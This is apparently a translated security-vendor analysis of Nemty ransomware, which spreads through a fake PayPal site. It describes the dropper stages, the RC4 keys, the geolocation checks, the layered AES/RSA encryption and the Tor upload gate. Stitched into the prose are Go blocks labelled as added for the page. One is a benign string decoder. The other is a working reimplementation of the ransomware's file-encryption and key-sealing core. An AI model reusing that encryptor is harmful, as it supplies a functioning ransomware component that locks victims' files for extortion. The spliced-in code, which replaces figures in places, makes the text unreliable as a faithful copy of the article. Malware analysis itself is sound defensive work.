Meet Nemty ransomware from a fake PayPal site

A new ransomware called Nemty has appeared on the network; it is presumed to be the successor of GandCrab or Buran. The malware is distributed mainly from a fake PayPal website and has a number of interesting features. Details of how this ransomware works are under the cut.


The new Nemty ransomware was discovered by the researcher nao_sec on September 7, 2019. The malware was distributed through a website disguised as PayPal; it can also reach a computer through the RIG exploit kit. The attackers used social engineering to get the user to run the file cashback.exe, supposedly received from the PayPal site. Another curiosity is that Nemty specifies the wrong port for the local proxy service, which stops the malware from sending its data to the server. So a victim who intends to pay the ransom has to upload the encrypted files to the attackers' Tor service themselves and wait for the attackers to decrypt them.

Several details of Nemty suggest that it was developed by the same people, or by cybercriminals associated with Buran and GandCrab.

  • Like GandCrab, Nemty has an Easter egg: a link to a photo of Russian president Vladimir Putin with an off-colour joke. The legacy GandCrab ransomware had an image with the same text.
  • Language artefacts in both programs point to the same Russian-speaking authors.
  • This is the first ransomware to use an 8192-bit RSA key. There is no point in this: a 2048-bit key is already well beyond any practical attack.
  • Like Buran, the ransomware is written in Object Pascal and compiled in Borland Delphi.

Static analysis

The malicious code executes in four stages. The first stage is running cashback.exe, a PE32 executable for MS Windows, 1198936 bytes in size. Its code is written in Visual C++ and was compiled on October 14, 2013. It contains an archive that is unpacked automatically when cashback.exe is run. The program uses the Cabinet.dll library and its functions FDICreate(), FDIDestroy() and others to extract files from the .cab archive.

SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC

After unpacking the archive, three files appear.

Next, temp.exe is launched, a PE32 executable for MS Windows, 307200 bytes in size. The code is written in Visual C++ and packed with MPRESS, a packer similar to UPX.

SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD

The next stage is ironman.exe. Once launched, temp.exe decrypts the data embedded in temp and renames it to ironman.exe, a 544768-byte PE32 executable. The code is compiled in Borland Delphi.

SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88

The final stage is restarting ironman.exe. At runtime it transforms its own code and runs itself from memory. This version of ironman.exe is the malicious one and is responsible for the encryption.

Attack vector

Currently, the Nemty ransomware is distributed via the website pp-back.info.


The full infection chain can be viewed in the app.any.run sandbox.

Installation

Cashback.exe is the start of the attack. As already mentioned, cashback.exe unpacks the .cab file it contains. It then creates a folder TMP4351$.TMP of the form %TEMP%\IXPxxx.TMP, where xxx is a number from 001 to 999.

After that, a registry key is written, which looks like this:

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0]
"rundll32.exe" "C:\Windows\system32\advpack.dll,DelNodeRunDLL32" "C:\Users\MALWAR~1\AppData\Local\Temp\IXPxxx.TMP"

It is used to delete the unpacked files at the next logon. Finally, cashback.exe starts the temp.exe process.

Temp.exe is the second stage of the infection chain

This is the process launched by cashback.exe, the second stage of the malware's execution. It tries to download AutoHotKey, a tool for running scripts on Windows, and runs the WindowSpy.ahk script stored in the resource section of the PE file.

The WindowSpy.ahk script decrypts the temporary file into ironman.exe using the RC4 algorithm and the password IwantAcake. The key is derived from the password with the MD5 hash.

temp.exe then starts the ironman.exe process.

Ironman.exe is the third stage

Ironman.exe reads the contents of the file iron.bmp and creates the file iron.txt containing the cryptolocker that is launched next.

After that, the malware loads iron.txt into memory and restarts it as ironman.exe. iron.txt is then deleted.

ironman.exe is the main component of the NEMTY ransomware, the one that encrypts files on the victim's computer. The malware creates a mutex named hate.

The first thing it does is determine the computer's location. Nemty opens a browser and finds out the external IP address at http://api.ipify.org. The country is then looked up from that IP at api.db-ip.com/v2/free/[IP]/countryName, and if the computer is in one of the regions listed below, execution of the malicious code stops:

  • Rasha
  • Belarus
  • Ukraine
  • Kazakhstan
  • Tajikistan

Most likely, the developers do not want to attract the attention of law enforcement in their countries of residence, so they do not encrypt files in their "home" jurisdictions.

If the victim's IP address is not in the list above, the malware encrypts the user's data.


To prevent file recovery, shadow copies are deleted:

Then it builds a list of files and folders that will not be encrypted, and a list of file extensions to skip:

  • windows
  • $RECYCLE.BIN
  • RSA
  • NTDETECT.COM
  • ntldr
  • MSDOS.SYS
  • IO.SYS
  • boot.ini
  • AUTOEXEC.BAT
  • ntuser.dat
  • desktop.ini
  • CONFIG.SYS
  • BOOTSECT.BAK
  • bootmgr
  • programdata
  • appdata
  • osoft
  • Common Files

log LOG CAB cab CMD cmd COM com cpl CPL exe EXE ini INI dll DDL lnk LNK url URL ttf TTF DECRYPT.txt NEMTY

Obfuscation

To hide URLs and configuration data, Nemty uses base64 encoding followed by RC4 with the keyword fuckav.

The decoding of such data using CryptStringToBinary looks like this:


Encryption

Nemty uses three layers of encryption:

  • AES-128-CBC for files. The 128-bit AES key is generated randomly and is the same for all files. It is stored in the configuration file on the victim's computer. The IV is generated randomly for each file and stored inside the encrypted file.
  • RSA-2048 for encrypting each file's IV. A key pair is generated per session. The session private key is stored in the configuration file on the victim's computer.
  • RSA-8192. The master public key is built into the program and is used to encrypt the configuration file, which holds the AES key and the private key of the RSA-2048 session pair.

Nemty first generates 32 bytes of random data. The first 16 bytes are used as the AES-128-CBC key.

The second algorithm is RSA-2048. The key pair is generated with CryptGenKey() and imported with CryptImportKey().

Once the session key pair has been generated, the public key is imported into the Microsoft Cryptographic Service Provider.

An example of the public key generated for the session:

After that, the private key is imported into the CSP.

An example of the private key generated for the session:

Last comes RSA-8192. The master public key is stored in obfuscated form (base64 + RC4) in the .data section of the PE file.

After base64 decoding and RC4 decryption with the password fuckav, the RSA-8192 key looks like this.
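Every RC4 step on this page uses the same primitive: WindowSpy.ahk decrypting the temporary file into ironman.exe under MD5("IwantAcake"), the obfuscated strings (base64, then RC4 with fuckav), and the embedded RSA-8192 master key just described. The Go below is an added example written for this page, not the sample's code or its AutoHotKey script; it is the decoder an analyst would point at a dumped buffer. The page confirms the MD5 key derivation only for the stage password, so DecodeString takes a flag for the string layer; the RC4 test vector is the standard one and the other inputs are constructed.

```go
package main

import (
	"crypto/md5"
	"crypto/rc4"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)

// Rc4Xor applies the RC4 keystream to data. RC4 is a stream cipher, so the
// same call encrypts and decrypts; the only error is a key outside 1..256 bytes.
func Rc4Xor(key, data []byte) ([]byte, error) {
	c, err := rc4.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out, nil
}

// rc4Key is the page's derivation for the stage password: key = MD5(password).
// With md5Key false the password bytes are used directly (an assumption for the
// string layer, which the page does not pin down).
func rc4Key(password string, md5Key bool) []byte {
	if !md5Key {
		return []byte(password)
	}
	sum := md5.Sum([]byte(password))
	return sum[:]
}

// DecryptStage reproduces what WindowSpy.ahk does to the temporary file
// (password "IwantAcake" in the sample): RC4 under MD5(password).
func DecryptStage(password string, blob []byte) ([]byte, error) {
	return Rc4Xor(rc4Key(password, true), blob)
}

// DecodeString reverses the base64 + RC4 obfuscation of embedded strings such as
// the gate URL and the RSA-8192 master key (password "fuckav" in the sample).
func DecodeString(encoded, password string, md5Key bool) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return nil, fmt.Errorf("not base64: %w", err)
	}
	return Rc4Xor(rc4Key(password, md5Key), raw)
}

// EncodeString is the forward direction; it exists here only to construct sample input.
func EncodeString(plain, password string, md5Key bool) (string, error) {
	ct, err := Rc4Xor(rc4Key(password, md5Key), []byte(plain))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	// Known-answer check from the standard RC4 test vectors.
	ct, _ := Rc4Xor([]byte("Key"), []byte("Plaintext"))
	fmt.Println(hex.EncodeToString(ct)) // bbf316e8d940af0ad3

	// Constructed sample: a gate URL obfuscated the way the page describes.
	blob, _ := EncodeString("http://gate.invalid/public/gate?data=", "fuckav", false)
	url, _ := DecodeString(blob, "fuckav", false)
	fmt.Println(string(url))

	// Constructed stage payload round-tripped under MD5("IwantAcake").
	stage, _ := DecryptStage("IwantAcake", []byte("MZ\x90\x00 constructed stub"))
	back, _ := DecryptStage("IwantAcake", stage)
	fmt.Printf("%q\n", back)
}
```

The practical use is on the PE's .data section: take the base64 blob, try DecodeString with fuckav both with and without the MD5 step, and keep whichever yields a PUBLICKEYBLOB or a readable URL; a key of the wrong form simply produces noise, which is why the decoder returns bytes rather than assuming text.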

As a result, the whole encryption process looks like this:

  • Generate a 128-bit AES key that will be used to encrypt all files.
  • Generate an IV for each file.
  • Generate a key pair for the RSA-2048 session.
  • Decode the embedded RSA-8192 key using base64 and RC4.
  • Encrypt the file contents with AES-128-CBC using the key from the first step.
  • Encrypt the IV with the RSA-2048 public key and base64-encode it.
  • Append the encrypted IV to the end of each encrypted file.
  • Add the AES key and the RSA-2048 session private key to the configuration.
  • Encrypt the configuration data described in the section "Collecting information about the infected computer" with the master RSA-8192 public key.

Example of encrypted files:
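The scheme above, reconstructed as runnable Go. This is an added example written for this page, not code from the Nemty sample or its authors, and it assumes details the page does not state: PKCS#1 v1.5 padding for the RSA operations (the CryptoAPI default), PKCS#7 padding for AES-CBC, a base64 trailer of fixed length, and splitting the configuration across several RSA blocks because a 2048-bit private key does not fit in one. The master key size is a parameter because generating an 8192-bit RSA key takes minutes. The layout otherwise follows the page: one AES key for all files, a per-file IV encrypted with the session public key and appended base64-encoded, and a config holding the AES key and session private key sealed with the master public key.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/base64"
	"encoding/json"
	"fmt"
)

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// NewSessionKey generates the per-session RSA-2048 pair (CryptGenKey in the sample).
func NewSessionKey() *rsa.PrivateKey { return must(rsa.GenerateKey(rand.Reader, 2048)) }

// EncryptFile: AES-128-CBC under the shared key with a fresh IV per file; the IV is
// RSA-2048-encrypted with the session public key, base64-encoded and appended.
func EncryptFile(plain, aesKey []byte, sessionPub *rsa.PublicKey) []byte {
	iv := make([]byte, aes.BlockSize)
	must(rand.Read(iv))
	n := aes.BlockSize - len(plain)%aes.BlockSize // PKCS#7 padding, always 1..16 bytes
	ct := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(must(aes.NewCipher(aesKey)), iv).CryptBlocks(ct, ct)
	encIV := must(rsa.EncryptPKCS1v15(rand.Reader, sessionPub, iv))
	return append(ct, base64.StdEncoding.EncodeToString(encIV)...)
}

// DecryptFile is the inverse once the session private key is known; a missing
// trailer, a foreign session key or a wrong AES key is reported as an error.
func DecryptFile(blob, aesKey []byte, sessionPriv *rsa.PrivateKey) ([]byte, error) {
	tl := base64.StdEncoding.EncodedLen(sessionPriv.Size())
	if len(blob) < tl+aes.BlockSize || (len(blob)-tl)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("not a file produced by this scheme")
	}
	encIV, err := base64.StdEncoding.DecodeString(string(blob[len(blob)-tl:]))
	if err != nil {
		return nil, err
	}
	iv, err := rsa.DecryptPKCS1v15(rand.Reader, sessionPriv, encIV)
	if err != nil {
		return nil, fmt.Errorf("IV trailer does not open with this session key: %w", err)
	}
	pt := make([]byte, len(blob)-tl)
	cipher.NewCBCDecrypter(must(aes.NewCipher(aesKey)), iv).CryptBlocks(pt, blob[:len(blob)-tl])
	if n := int(pt[len(pt)-1]); n >= 1 && n <= aes.BlockSize && bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return pt[:len(pt)-n], nil
	}
	return nil, fmt.Errorf("bad padding: wrong AES key or corrupted file")
}

// SealConfig encrypts the JSON config with the master public key. One PKCS#1 v1.5 block
// carries at most Size()-11 bytes and the config embeds a whole RSA-2048 private key,
// so it is chunked here (an assumption; the page does not say how the sample does it).
func SealConfig(cfg map[string]string, master *rsa.PublicKey) [][]byte {
	js := must(json.Marshal(cfg))
	var chunks [][]byte
	for len(js) > 0 {
		n := master.Size() - 11
		if n > len(js) {
			n = len(js)
		}
		chunks = append(chunks, must(rsa.EncryptPKCS1v15(rand.Reader, master, js[:n])))
		js = js[n:]
	}
	return chunks
}

// RoundTrip encrypts one file and seals the config, then does what only the attacker
// can: master private key -> config -> session private key + AES key -> IV -> file.
// The sample's master key is 8192-bit; generating one takes minutes, so pass 2048 here.
func RoundTrip(plain []byte, masterBits int) ([]byte, error) {
	master := must(rsa.GenerateKey(rand.Reader, masterBits))
	session := NewSessionKey()
	aesKey := make([]byte, 16) // the sample draws 32 random bytes and keeps the first 16
	must(rand.Read(aesKey))
	blob := EncryptFile(plain, aesKey, &session.PublicKey)
	chunks := SealConfig(map[string]string{
		"key":    base64.StdEncoding.EncodeToString(aesKey),
		"pr_key": base64.StdEncoding.EncodeToString(x509.MarshalPKCS1PrivateKey(session)),
	}, &master.PublicKey)
	var js []byte // attacker side: from here on only the master private key is needed
	for _, c := range chunks {
		js = append(js, must(rsa.DecryptPKCS1v15(rand.Reader, master, c))...)
	}
	cfg := map[string]string{}
	must(cfg, json.Unmarshal(js, &cfg))
	sessionPriv := must(x509.ParsePKCS1PrivateKey(must(base64.StdEncoding.DecodeString(cfg["pr_key"]))))
	return DecryptFile(blob, must(base64.StdEncoding.DecodeString(cfg["key"])), sessionPriv)
}

func main() {
	out, err := RoundTrip([]byte("constructed sample document"), 2048)
	fmt.Printf("%q %v\n", out, err)
}
```

Running the round trip shows why the layering works for the operators: everything written to the victim's disk (the per-file IV trailers and the config with the AES key and session private key) is sealed under a public key whose private half never leaves them, so the victim's only way forward is to get the config to the attackers, which is what the broken 127.0.0.1:9050 upload described later was meant to do.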

Collecting information about the infected computer

The ransomware collects the keys needed to decrypt the infected files, so the attacker can actually build a decryptor. In addition, Nemty collects user data such as the user name, computer name and hardware profile.

It calls GetLogicalDrives(), GetFreeSpace() and GetDriveType() to collect information about the infected computer's drives.

The collected information is stored in the configuration file. After decoding the string, we get the list of parameters in the configuration file:

Example configuration from an infected computer:

The configuration template can be represented as follows:

{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username]", "OS":"[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[UserID]", "key":"[key]", "pr_key":"[pr_key]

Nemty stores the collected data in JSON format in the file %USER%/_NEMTY_.nemty. The FileID is 7 characters long and generated randomly, for example _NEMTY_tgdLYrd_.nemty. The FileID is also appended to the end of the encrypted file.

Ransom note

After the files have been encrypted, a file _NEMTY_[FileID]-DECRYPT.txt appears on the desktop with the following contents:

At the end of the file there is encrypted information about the infected computer.


Network communication

The ironman.exe process downloads a Tor distribution from https://dist.torproject.org/torbrowser/8.5.4/tor-win32-0.4.0.5.zip and tries to install it.

Nemty then tries to send the configuration data to 127.0.0.1:9050, where it expects to find the Tor Browser proxy. However, by default the Tor Browser SOCKS proxy listens on port 9150; port 9050 is used by the tor daemon on Linux or by the Expert Bundle on Windows. As a result, no data reaches the attackers' server. Instead, the victim can upload the configuration file manually by visiting the Nemty decryption service on Tor via the link in the ransom note.

Connecting to the Tor proxy:

An HTTP GET request is built to 127.0.0.1:9050/public/gate?data=

Here you can see the open TCP ports used by the local Tor proxy:

The Nemty decryption service on the Tor network:

You can upload an encrypted image (jpg, png, bmp) to test the decryption service.

After that, the attacker demands the ransom. If it is not paid, the price doubles.

Conclusion

At the moment, it is impossible to decrypt files encrypted by Nemty without paying the ransom. This version of the ransomware shares features with the Buran ransomware and the older GandCrab: compilation in Borland Delphi and images with the same text. In addition, it is the first encryptor to use an 8192-bit RSA key, which again makes no sense, since a 2048-bit key is already well beyond any practical attack. Finally, and interestingly, it tries to use the wrong port for the local Tor proxy service.

However, the Acronis Backup and Acronis True Image solutions prevent Nemty ransomware from reaching users' computers and data, and service providers can protect their customers with Acronis Backup Cloud. Complete cyber protection offers not only backup but also protection with Acronis Active Protection, a unique technology based on artificial intelligence and behavioural heuristics that can neutralise even previously unknown malware.

source: www.habr.com
